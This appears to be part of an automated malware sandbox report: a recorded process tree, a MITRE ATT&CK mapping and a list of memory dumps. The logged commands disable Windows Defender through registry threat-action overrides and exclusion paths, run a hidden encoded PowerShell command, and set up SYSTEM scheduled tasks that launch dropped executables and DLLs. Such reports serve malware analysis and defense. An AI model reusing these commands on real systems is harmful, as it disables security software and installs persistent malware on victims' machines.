- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:9360
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:9396
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:9448
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:9508
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:9552
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:9572
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:9596
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:9624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2340
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:9652
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CzJsMnpmYIHU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CzJsMnpmYIHU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JDaUpqLWU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JDaUpqLWU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MCoLVEAxuDhpC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MCoLVEAxuDhpC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hxLIpSuPLJUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hxLIpSuPLJUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yjiDqdgnMIE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yjiDqdgnMIE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pJxacTbbSlizmPVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pJxacTbbSlizmPVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZKIEJJPSRIlthXTT\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZKIEJJPSRIlthXTT\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:9680
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:10040
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:10100
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:10132
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDaUpqLWU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:10208
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDaUpqLWU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:10252
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCoLVEAxuDhpC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:10348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCoLVEAxuDhpC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:10432
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:10700
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8496
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hxLIpSuPLJUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:8824
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hxLIpSuPLJUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:10532
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yjiDqdgnMIE" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:10628
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yjiDqdgnMIE" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:10732
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pJxacTbbSlizmPVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:10792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pJxacTbbSlizmPVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:10824
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:10468
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:10368
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:10936
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:10960
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZKIEJJPSRIlthXTT /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:10980
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZKIEJJPSRIlthXTT /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:11004
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "getdCpFCO" /SC once /ST 02:17:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:11044
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "getdCpFCO"
  2⤵
  PID:11108
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "getdCpFCO"
  2⤵
  PID:10184
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "cbBtQoNpOByPPTwrn" /SC once /ST 06:55:39 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\zzGITVO.exe\" V8 /site_id 754 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:10380
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "cbBtQoNpOByPPTwrn"
  2⤵
  PID:152

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:7848

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:7840

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:9844

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:10160
- C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
  MaskVPNUpdate.exe /silent
  2⤵
  PID:15884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:11164

C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\zzGITVO.exe
C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\zzGITVO.exe V8 /site_id 754 /S
1⤵
PID:4784
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bWIRRaDZCpCYZHZEtf"
  2⤵
  PID:17476
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
  2⤵
  PID:11884
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:12100
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
  2⤵
  PID:12168
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:12360
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JDaUpqLWU\jDMuOn.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qTJPyBJZsADsDDd" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:12368
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "qTJPyBJZsADsDDd2" /F /xml "C:\Program Files (x86)\JDaUpqLWU\VaSbLFK.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:12716
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "qTJPyBJZsADsDDd"
  2⤵
  PID:13056
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "qTJPyBJZsADsDDd"
  2⤵
  PID:13236
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "LMVWktnylhEgic" /F /xml "C:\Program Files (x86)\CzJsMnpmYIHU2\cAxcodW.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:13860
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "LmWwWbygFrIYQ2" /F /xml "C:\ProgramData\pJxacTbbSlizmPVB\qUZsulx.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:13680
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "kIaWWMRbvXNLsrwhO2" /F /xml "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\enLZjbE.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5736
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "ChSiuBhrWLQfWhgdkuF2" /F /xml "C:\Program Files (x86)\MCoLVEAxuDhpC\VFlsNoM.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:14060
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "hMZOFgVuABkGdcuhk" /SC once /ST 12:49:55 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZKIEJJPSRIlthXTT\JBPXyJzh\TUUyUWT.dll\",#1 /site_id 754" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:15548
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "hMZOFgVuABkGdcuhk"
  2⤵
  PID:15800
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "spuhLdIvPoBx" /SC once /ST 07:39:51 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\uzFTStEq\terJxSv.exe\" U4 /S"
  2⤵
  - Creates scheduled task(s)
  PID:16144
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "spuhLdIvPoBx"
  2⤵
  PID:15904

\??\c:\windows\system32\rundll32.EXE
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\ZKIEJJPSRIlthXTT\JBPXyJzh\TUUyUWT.dll",#1 /site_id 754
1⤵
PID:16064
- C:\Windows\SysWOW64\rundll32.exe
  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\ZKIEJJPSRIlthXTT\JBPXyJzh\TUUyUWT.dll",#1 /site_id 754
  2⤵
  PID:16092
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "hMZOFgVuABkGdcuhk"
    3⤵
    PID:16724

C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\uzFTStEq\terJxSv.exe
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\uzFTStEq\terJxSv.exe U4 /S
1⤵
PID:16616

C:\Program Files (x86)\Picture Lab\Pictures Lab.exe
"C:\Program Files (x86)\Picture Lab\Pictures Lab.exe"
1⤵
PID:16856

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:3472

C:\Users\Admin\AppData\Local\Temp\C3C.tmp.exe
C:\Users\Admin\AppData\Local\Temp\C3C.tmp.exe
1⤵
PID:9012

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Program Files\VideoLAN\VLC\NEWS.txt
1⤵
PID:12820

C:\Users\Admin\AppData\Local\Temp\2061.tmp.exe
C:\Users\Admin\AppData\Local\Temp\2061.tmp.exe
1⤵
PID:13616

C:\Users\Admin\AppData\Local\Temp\3726.tmp.exe
C:\Users\Admin\AppData\Local\Temp\3726.tmp.exe
1⤵
PID:5176

C:\Users\Admin\AppData\Local\Temp\4D20.tmp.exe
C:\Users\Admin\AppData\Local\Temp\4D20.tmp.exe
1⤵
PID:15128
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 15128 -s 1108
  2⤵
  - Program crash
  PID:15056

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:15592

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:13068

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:8640

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:15512

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:16104

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:16808

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:13544

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:16036

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:17340

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:7908

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7840

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:17748

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:18116

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x418
1⤵
PID:4740

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

Software Discovery

T1518

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/208-72-0x0000000005070000-0x0000000005071000-memory.dmp

Filesize
4KB

Download
memory/208-78-0x00000000050D0000-0x00000000050D1000-memory.dmp

Filesize
4KB

Download
memory/208-71-0x0000000005060000-0x0000000005061000-memory.dmp

Filesize
4KB

Download
memory/208-70-0x0000000005050000-0x0000000005051000-memory.dmp

Filesize
4KB

Download
memory/208-73-0x0000000005080000-0x0000000005081000-memory.dmp

Filesize
4KB

Download
memory/208-64-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/208-75-0x00000000050A0000-0x00000000050A1000-memory.dmp

Filesize
4KB

Download
memory/208-74-0x0000000005090000-0x0000000005091000-memory.dmp

Filesize
4KB

Download
memory/208-77-0x00000000050C0000-0x00000000050C1000-memory.dmp

Filesize
4KB

Download
memory/208-76-0x00000000050B0000-0x00000000050B1000-memory.dmp

Filesize
4KB

Download
memory/208-79-0x00000000050E0000-0x00000000050E1000-memory.dmp

Filesize
4KB

Download
memory/208-62-0x0000000002541000-0x000000000256C000-memory.dmp

Filesize
172KB

Download
memory/208-81-0x0000000005100000-0x0000000005101000-memory.dmp

Filesize
4KB

Download
memory/208-80-0x00000000050F0000-0x00000000050F1000-memory.dmp

Filesize
4KB

Download
memory/208-82-0x0000000005110000-0x0000000005111000-memory.dmp

Filesize
4KB

Download
memory/208-68-0x0000000002580000-0x0000000002581000-memory.dmp

Filesize
4KB

Download
memory/208-69-0x0000000005040000-0x0000000005041000-memory.dmp

Filesize
4KB

Download
memory/208-66-0x00000000021D0000-0x00000000021D1000-memory.dmp

Filesize
4KB

Download
memory/208-67-0x00000000021E0000-0x00000000021E1000-memory.dmp

Filesize
4KB

Download
memory/208-65-0x00000000021C0000-0x00000000021C1000-memory.dmp

Filesize
4KB

Download
memory/732-145-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/848-25-0x0000000005100000-0x0000000005101000-memory.dmp

Filesize
4KB

Download
memory/848-15-0x0000000005060000-0x0000000005061000-memory.dmp

Filesize
4KB

Download
memory/848-21-0x00000000050C0000-0x00000000050C1000-memory.dmp

Filesize
4KB

Download
memory/848-23-0x00000000050E0000-0x00000000050E1000-memory.dmp

Filesize
4KB

Download
memory/848-7-0x0000000003921000-0x000000000394C000-memory.dmp

Filesize
172KB

Download
memory/848-24-0x00000000050F0000-0x00000000050F1000-memory.dmp

Filesize
4KB

Download
memory/848-22-0x00000000050D0000-0x00000000050D1000-memory.dmp

Filesize
4KB

Download
memory/848-9-0x0000000005000000-0x0000000005001000-memory.dmp

Filesize
4KB

Download
memory/848-26-0x0000000005110000-0x0000000005111000-memory.dmp

Filesize
4KB

Download
memory/848-17-0x0000000005080000-0x0000000005081000-memory.dmp

Filesize
4KB

Download
memory/848-16-0x0000000005070000-0x0000000005071000-memory.dmp

Filesize
4KB

Download
memory/848-20-0x00000000050B0000-0x00000000050B1000-memory.dmp

Filesize
4KB

Download
memory/848-19-0x00000000050A0000-0x00000000050A1000-memory.dmp

Filesize
4KB

Download
memory/848-14-0x0000000005050000-0x0000000005051000-memory.dmp

Filesize
4KB

Download
memory/848-18-0x0000000005090000-0x0000000005091000-memory.dmp

Filesize
4KB

Download
memory/848-12-0x0000000005030000-0x0000000005031000-memory.dmp

Filesize
4KB

Download
memory/848-13-0x0000000005040000-0x0000000005041000-memory.dmp

Filesize
4KB

Download
memory/848-10-0x0000000005010000-0x0000000005011000-memory.dmp

Filesize
4KB

Download
memory/848-11-0x0000000005020000-0x0000000005021000-memory.dmp

Filesize
4KB

Download
memory/848-8-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/1052-203-0x00000000015A0000-0x00000000015A1000-memory.dmp

Filesize
4KB

Download
memory/1052-202-0x0000000001580000-0x0000000001594000-memory.dmp

Filesize
80KB

Download
memory/1052-201-0x0000000001570000-0x0000000001571000-memory.dmp

Filesize
4KB

Download
memory/1052-199-0x0000000000E60000-0x0000000000E61000-memory.dmp

Filesize
4KB

Download
memory/1052-206-0x000000001CFE0000-0x000000001CFE2000-memory.dmp

Filesize
8KB

Download
memory/1052-198-0x00007FF907D90000-0x00007FF90877C000-memory.dmp

Filesize
9.9MB

Download
memory/1568-126-0x00000000001F0000-0x00000000001F1000-memory.dmp

Filesize
4KB

Download
memory/1780-151-0x00000000009E4000-0x00000000009E5000-memory.dmp

Filesize
4KB

Download
memory/1780-144-0x00000000009E0000-0x00000000009E2000-memory.dmp

Filesize
8KB

Download
memory/1780-146-0x00000000009E2000-0x00000000009E4000-memory.dmp

Filesize
8KB

Download
memory/1780-141-0x00007FF90B6A0000-0x00007FF90C040000-memory.dmp

Filesize
9.6MB

Download
memory/2056-123-0x00007FF90B6A0000-0x00007FF90C040000-memory.dmp

Filesize
9.6MB

Download
memory/2056-129-0x0000000002080000-0x0000000002082000-memory.dmp

Filesize
8KB

Download
